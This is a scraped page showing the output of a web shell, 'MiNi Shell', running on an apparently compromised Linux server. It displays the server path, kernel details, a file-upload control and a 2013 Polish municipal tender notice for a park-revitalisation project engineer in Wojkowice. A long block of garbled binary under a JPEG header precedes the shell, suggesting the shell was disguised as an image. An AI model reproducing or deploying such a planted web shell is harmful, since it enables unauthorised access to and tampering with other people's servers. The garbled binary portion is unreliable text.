JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130820/335542-N-2013.html

<p class="kh_header"><b>Wojkowice: Pełnienie funkcji Inżyniera Projektu nad realizacją zadania inwestycyjnego pn.:

  Rewitalizacja Parku Miejskiego w Wojkowicach</b><br>
<b>Numer ogłoszenia: 335542 - 2013; data zamieszczenia: 20.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Wojkowice , ul. Sobieskiego 290a, 42-580 Wojkowice, woj. śląskie, tel. 32 7695066, faks 32 7695073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wojkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Projektu nad realizacją zadania inwestycyjnego pn.:

  Rewitalizacja Parku Miejskiego w Wojkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi związane z pełnieniem funkcji Inżyniera Projektu 
nad prawidłową realizacją zadania inwestycyjnego pn.: Rewitalizacja Parku Miejskiego
w Wojkowicach. 

2. Przedmiot zamówienia  obejmuje  nadzorowanie  robót  budowlanych,  które zostaną  objęte Umową  na  roboty  budowlane  zawartą  przez  Zamawiającego  z  wybranym  w  odrębnie  przeprowadzonym postępowaniu wykonawcą  robót  budowlanych. Dokumentacja projektowa na realizację robót budowlanych  stanowi załącznik nr 8 do niniejszej SIWZ.

Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie
z  dnia  7 lipca  1994  roku  Prawo  budowlane  (Dz.  U.  z  2010  r.  Nr  243,  poz.  1623 z późn. zm.), Kodeksowi Cywilnemu  i ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn.  zm.). 
 
3. Ogólne obowiązki Inżyniera Projektu     
                                                     
Nadzór nad realizacją robót budowlanych wszystkich etapów budowy ( 7 etapów) w  zakresie zadania inwestycyjnego pn.: Rewitalizacja Parku Miejskiego w Wojkowicach. 


1) Etap 1 -  plac z fontanną w południowo- wschodnim narożniku parku, oraz prowadzące na plac schody terenowe.

Zakres robót obejmuje:
-  budowę fontanny (część architektoniczno-konstrukcyjną, technologię fontanny) 
     oraz części instalacyjne w zakresie przyłączy: energetycznego, wodociągowego
     i kanalizacyjnego,
-  budowę nawierzchni placu przy fontannie z fragmentami ścieżek przy placu, oraz 
    odwodnieniem,
-  przebudowę schodów terenowych i muru oporowego od strony południowo
- wschodniej,
Istniejące murki oporowe z naturalnego kamienia, od strony wschodniej i południowej
przebudowywanych schodów zostaną poddane renowacji i obłożone płytami granitowymi.

2) Etap 2  -   aleja centralna wraz z placem przy amfiteatrze.

Zakres robót obejmuje:
-  wykonanie zagospodarowania terenu wraz rozmieszczeniem ławek i koszy na śmieci,
-  wykonanie nowego ukształtowania terenu, wynikającego z konieczności dostosowania spadków podłużnych alei do wymagań przepisów,
-  budowę schodów terenowych i muru oporowego, ograniczającego od południa
    plac przy amfiteatrze,
-   budowę nawierzchni utwardzonych, w tym konturowej mapy Polski w skali
    1:50 000, wykonanej z różnokolorowego bruku na placu przy amfiteatrze.

3) Etap 3 -  aleja wzdłuż ulicy Plaka wraz z małą architekturą i parking w północno - 
       wschodnim narożniku parku.

Zakres robót obejmuje:
-  budowę alei z rozdziałem na ścieżkę rowerową i pieszą,
-  budowę wysepek przeznaczonych do wypoczynku,
-  przebudowę parkingu w północno - wschodnim narożniku parku.

4) Etap 4 -  aleja wzdłuż ulicy Sobieskiego wraz parkingiem przy budynku Urzędu Miasta.

Zakres robót obejmuje:
- przebudowę alei wzdłuż ulicy Sobieskiego,
- przebudowę parkingu,

5) Etap 5  -   plac zabaw oraz prowadzące do niego dojścia.

Zakres robót obejmuje:
- budowę placu obejmującą piaskownicę, bezpieczne nawierzchnie pod dobrane urządzenia zabawowe, montaż tych urządzeń, oraz osłon drzew, ławek i koszy na śmieci.
-  przebudowę schodów terenowych i dojścia od strony południowo - wschodniej,

6) Etap 6  -  ścieżki rowerowe oraz te ścieżki piesze (podlegające renowacji. 
        i nowoprojektowane), które nie zostały ujęte w innych etapach.

Zakres robót obejmuje:
- wykonanie zagospodarowanie terenu wraz rozmieszczeniem ławek i koszy na śmieci,
- wykonanie nowego ukształtowania terenu, wynikającego z konieczności dostosowania spadków podłużnych ścieżek pieszych do wymagań przepisów,
- budowę schodów terenowych,
- budowę nawierzchni utwardzonych.

7) Etap nr 7 -  ścieżka zdrowia, place dydaktyczne połączone ścieżkami oraz kącik 
       szachowy w północnym, północno- wschodnim i zachodnim obszarze parku.

Zakres robót obejmuje:
- budowę trasy oraz nawierzchni ścieżki zdrowia z placykami na których zlokalizowane
    będą urządzenia sportowe na wschodnim obszarze parku,
- budowę placyków dydaktycznych i łączących je ścieżek na zachodnim obszarze parku,
- budowę placu z nawierzchnią i lokalizacją kącika szachowego na północnym obszarze z łącznikiem /ścieżką/północnym i południowym wychodzącym z placu.

4. Podstawowe obowiązki Inżyniera Projektu w okresie realizacji robót budowlanych 
       i po ich zakończeniu obejmują:

1)Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności   realizacji z projektem budowlanym i pozwoleniem na budowę oraz przepisami i zasadami wiedzy technicznej.
2) Sprawdzanie jakości wykonywanych robót budowlanych i zastosowanych materiałów, w szczególności zapobieganie zastosowaniu wyrobów wadliwych i niedopuszczalnych do stosowania w budownictwie.
3) Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających. 
4) Uczestniczenie w próbach i odbiorach technicznych instalacji i urządzeń technicznych.
5) Przygotowanie i udział w czynnościach odbioru końcowego robót.
6) Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad.
7) Kontrolowanie rozliczeń robót budowlanych.
8) Przygotowanie danych do rozliczenia rzeczowego i finansowego zadania inwestycyjnego  ze wszystkimi instytucjami współfinansującymi.
9) Rozliczenie finansowe i rzeczowe kontraktu.
10) Zarządzanie realizacją Projektu do czasu wystawienia protokołu ostatecznego odbioru i przekazania końcowego robót. 
11) Przekazanie inwestycji do eksploatacji, zgodnie z obowiązującymi przepisami prawa.
12) Kontynuowanie obowiązków Inżyniera Projektu w okresie gwarancji w zakresie zarządzania gwarancją, w szczególności praw Zamawiającego i obowiązków Wykonawcy robót z niej wynikających.
13) Uczestnictwo w kontrolach gwarancyjnych wraz z Zamawiającym, po wykonaniu robót budowlanych, w okresie gwarancji udzielonej przez Wykonawcę tych robót.
14)Funkcja Inżyniera Projektu będzie pełniona zgodnie z umową oraz zasadami obowiązującymi dla projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.54.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek posiadania wiedzy i doświadczenia, o którym mowa w art. 22 ust.1 pkt 2 Pzp, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

a) Wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje
 co  najmniej jedna usługę, polegającą na sprawowaniu nadzoru inwestorskiego nad:

 - budową, przebudową ulic, chodników, zatok lub placów z kostki brukowej          betonowej,
- budową, przebudową ulic, chodników, zatok lub placów w technologii robót 
  brukarskich z materiałów kamiennych,
- budową, przebudową sieci wod-kan, deszczowej,
- budową, przebudową linii kablowych elektrycznych lub oświetlenia ulicznego

  na łączną kwotę minimum - 100 000 zł (brutto.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków 
tym  zakresie.  Zamawiający  dokona  oceny  spełnienia  warunku  udziału  w 
postępowaniu  w  tym  zakresie  na  podstawie  oświadczenia  o  spełnianiu  
warunków udziału  w  postępowaniu  określonych  w  art.  22  ust.  1  Pzp  (o  którym
mowa  w   pkt. 7.4.1. ppkt 1 SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli:
- Dysponuje osobami, które będą uczestniczyć w wykonaniu zamówienia posiadającymi uprawnienia budowlane w specjalnościach:
             
a)Inspektor nadzoru robót drogowych -  posiadający uprawnienia budowlane do 
 kierowania  (nadzorowania)  robót  w  specjalności  drogowej bez  ograniczeń lub 
 odpowiadające im ważne uprawnienia budowlane, które zostały wydane na 
 podstawie wcześniej obowiązujących przepisów.            

b) Inspektor nadzoru robót ogólnobudowlanych - posiadający uprawnienia 
 budowlane do kierowania (nadzorowania)  robót  w  specjalności  konstrukcyjno 
 budowlanej  bez  ograniczeń lub odpowiadające im ważne uprawnienia budowlane, 
 które zostały wydane na podstawie wcześniej obowiązujących przepisów.          
 
c) Inspektor nadzoru robót elektrycznych - posiadający uprawnienia budowlane bez ograniczeń do kierowania (nadzorowania)  robotami  w  specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  lub uprawnienia równoważne do powyższych, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
    
d) Inspektor nadzoru robót instalacyjnych  - posiadający uprawnienia budowlane bez ograniczeń do kierowania (nadzorowania)  robót  w  specjalności  instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych lub uprawnienia równoważne do powyższych, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne  postanowienia  umowy zawarte są we  wzorze umowy,  która  jest 
   załącznikiem nr 2 do niniejszej SIWZ. 
2. Zamawiający dokona zmiany  postanowień zawartej umowy w stosunku do treści
oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach: 
2.1.  na długość  przewidywanego terminu wykonania zamówienia (przedmiotu   umowy)wpływ mogą mieć: 

a)  wydłużenie  okresu realizacji robót budowlanych przewidzianych na podstawie Umowy na roboty budowlane dla inwestycji pn. Rewitalizacja Parku Miejskiego 
w Wojkowicach.
W przypadku wydłużenia  terminu realizacji przedmiotu umowy (zamówienia) nie zostanie zmienione wynagrodzenie  Wykonawcy,
b)opóźnienia w zawarciu Umowy na roboty budowlane dla inwestycji pn. Rewitalizacja Parku Miejskiego w Wojkowicach  spowodowane w szczególności  korzystaniem  przez Wykonawców ze środków  ochrony  prawnej określonych w ustawie Pzp,	  
c) wystąpienie siły wyższej np. pożaru, powodzi, itp., 	 
d)  wstrzymanie  robót  realizowanych  przez  Wykonawcę Umowy na roboty budowlane dla inwestycji pn. Rewitalizacja Parku Miejskiego w Wojkowicach,
e)  zmiany przepisów prawa związanych z wykonaniem przedmiotowej umowy,  

2.2.zmiany zakresu i sposobu wykonania przedmiotu zamówienia (przedmiotu umowy): 
a) zaistnienie  okoliczności  powodujących,  że  wykonanie  umowy w pierwotnym zakresie  nie  jest  możliwe, czego nie można było przewidzieć w chwili zawarcia umowy, 
b) rezygnacja  z  części  usług  lub  zmiana  zakresu przedmiotu umowy (zamówienia),  w szczególności wskutek:  zmiany zakresu lub rodzaju robót budowlanych wykonywanych  w ramach Umowy dla inwestycji pn. Rewitalizacja Parku Miejskiego w Wojkowicach.
2.3. zmiany  osobowe  w  zakresie  pełnienia  funkcji  Inspektorów  Nadzoru
Inwestorskiego,  pod warunkiem że następcy będą spełniać wymagania co najmniej jak poprzednik,
2.4.  inne zmiany: 	  
a)zmiany podwykonawców. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego  Wykonawca  opierał  się  wykazując  spełnianie  warunków  udziału w postępowaniu,  Zamawiający  dopuści  zmianę  pod  warunkiem,  że  nowy podwykonawca  wykaże  spełnianie  warunków  w  zakresie  nie  mniejszym  niż wskazane  na  etapie  postępowania  o  udzielenie  zamówienia  publicznego  przez dotychczasowego podwykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wojkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Wojkowice, ul. Jana III Sobieskiego 290a, Referat Gospodarki Komunalnej - pokój nr 13 - I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 10:00, miejsce: Urząd Miasta Wojkowice, ul. Jana III Sobieskiego 290a, Kancelaria - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.


Priorytet VI Zrównoważony rozwój miast
Działanie 6.2 Rewitalizacja obszarów zdegradowanych
Poddziałanie 6.2.2. Rewitalizacja - małe miasta.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com